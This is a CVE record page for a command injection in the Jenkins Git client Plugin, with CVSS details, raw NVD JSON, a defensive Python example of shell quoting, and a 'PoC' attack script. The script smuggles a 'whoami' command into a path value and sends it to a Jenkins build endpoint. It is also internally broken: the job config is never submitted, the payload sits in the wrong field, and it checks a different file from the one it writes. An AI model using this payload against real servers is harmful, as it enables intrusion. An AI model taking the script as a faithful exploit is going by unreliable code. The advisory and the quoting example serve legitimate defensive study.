Security Vulnerability Report
CVE-2025-67640 CVSS 5.0 MEDIUM

CVE-2025-67640

Published: 2025-12-10 17:15:57
Last Modified: 2025-12-17 17:31:23

Description

Jenkins Git client Plugin 6.4.0 and earlier does not correctly escape the path to the workspace directory as part of an argument in a temporary shell script generated by the plugin, allowing attackers able to control the workspace directory name to inject arbitrary OS commands.
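
The flaw class named in the description, shown as an added illustration that is not the plugin's code: the `git -C ... status` line, the function names and the sample paths are constructed assumptions. The example models only the quoting step and tokenises the generated line with `shlex` instead of executing it.

```python
import shlex

# Constructed sample workspace paths (not taken from the advisory).
# The second one contains single quotes and ';' command separators.
SAMPLE_WORKSPACES = [
    "/var/jenkins/workspace/build-main",
    "/var/jenkins/workspace/pr-1'; echo INJECTED; echo '",
]


def naive_script(workspace):
    """Unsafe pattern: wrap the path in single quotes without escaping it."""
    return f"git -C '{workspace}' status"


def quoted_script(workspace):
    """Hardened pattern: shlex.quote rewrites each embedded ' as '"'"'."""
    return f"git -C {shlex.quote(workspace)} status"


def shell_tokens(script):
    """Tokenise one script line roughly as a POSIX shell would, without
    running it. punctuation_chars=True makes ';', '&&', '|' separate tokens."""
    lexer = shlex.shlex(script, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def is_single_argument(script, workspace):
    """True only if the whole workspace path reaches git as one argument."""
    return shell_tokens(script) == ["git", "-C", workspace, "status"]


if __name__ == "__main__":
    for ws in SAMPLE_WORKSPACES:
        for build in (naive_script, quoted_script):
            line = build(ws)
            verdict = "ok" if is_single_argument(line, ws) else "BROKEN QUOTING"
            print(f"{build.__name__:14} {verdict:15} {shell_tokens(line)}")
```

The same check can serve as a regression test for any code that writes paths into generated shell scripts: feed it directory names containing quotes, semicolons and spaces, and require that the path always comes back as exactly one token.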

CVSS Details

CVSS Score: 5.0
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:jenkins:git_client:*:*:*:*:*:jenkins:*:* - VULNERABLE
Jenkins Git client Plugin <= 6.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67640 PoC - Jenkins Git client Plugin Command Injection
# This PoC demonstrates command injection via workspace directory name
import requests
import urllib.parse

# Target Jenkins server
JENKINS_URL = "http://target-jenkins-server:8080"
JOB_NAME = "vulnerable-project"
API_TOKEN = "attacker-api-token"

# Malicious workspace directory name with command injection
malicious_workspace = "workspace'; whoami > /tmp/pwned #"

# Step 1: Create or configure Jenkins job with malicious workspace
job_config = f"""
<?xml version='1.1' encoding='UTF-8'?>
<project>
  <description>Test project with injected workspace</description>
  <builders>
    <hudson.plugins.git.GitBuilder>
      <remote>{malicious_workspace}</remote>
    </hudson.plugins.git.GitBuilder>
  </builders>
</project>
"""

# Step 2: Trigger build to execute injected command
build_url = f"{JENKINS_URL}/job/{JOB_NAME}/build"
response = requests.post(build_url, auth=('attacker', API_TOKEN))

# Step 3: Check if command was executed
check_url = f"{JENKINS_URL}/userContent/pwned"
response = requests.get(check_url)
if response.status_code == 200:
    print("[+] Command injection successful! Check /tmp/pwned")
else:
    print("[-] Injection may have failed or requires different trigger")

References

https://www.jenkins.io/security/advisory/2025-12-10/#SECURITY-3614 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67640", "sourceIdentifier": "[email protected]", "published": "2025-12-10T17:15:56.517", "lastModified": "2025-12-17T17:31:23.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins Git client Plugin 6.4.0 and earlier does not not correctly escape the path to the workspace directory as part of an argument in a temporary shell script generated by the plugin, allowing attackers able to control the workspace directory name to inject arbitrary OS commands."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:git_client:*:*:*:*:*:jenkins:*:*", "versionEndExcluding": "6.4.1", "matchCriteriaId": "197C8F80-7DE7-4D0E-B681-F7F8A094D122"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-12-10/#SECURITY-3614", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}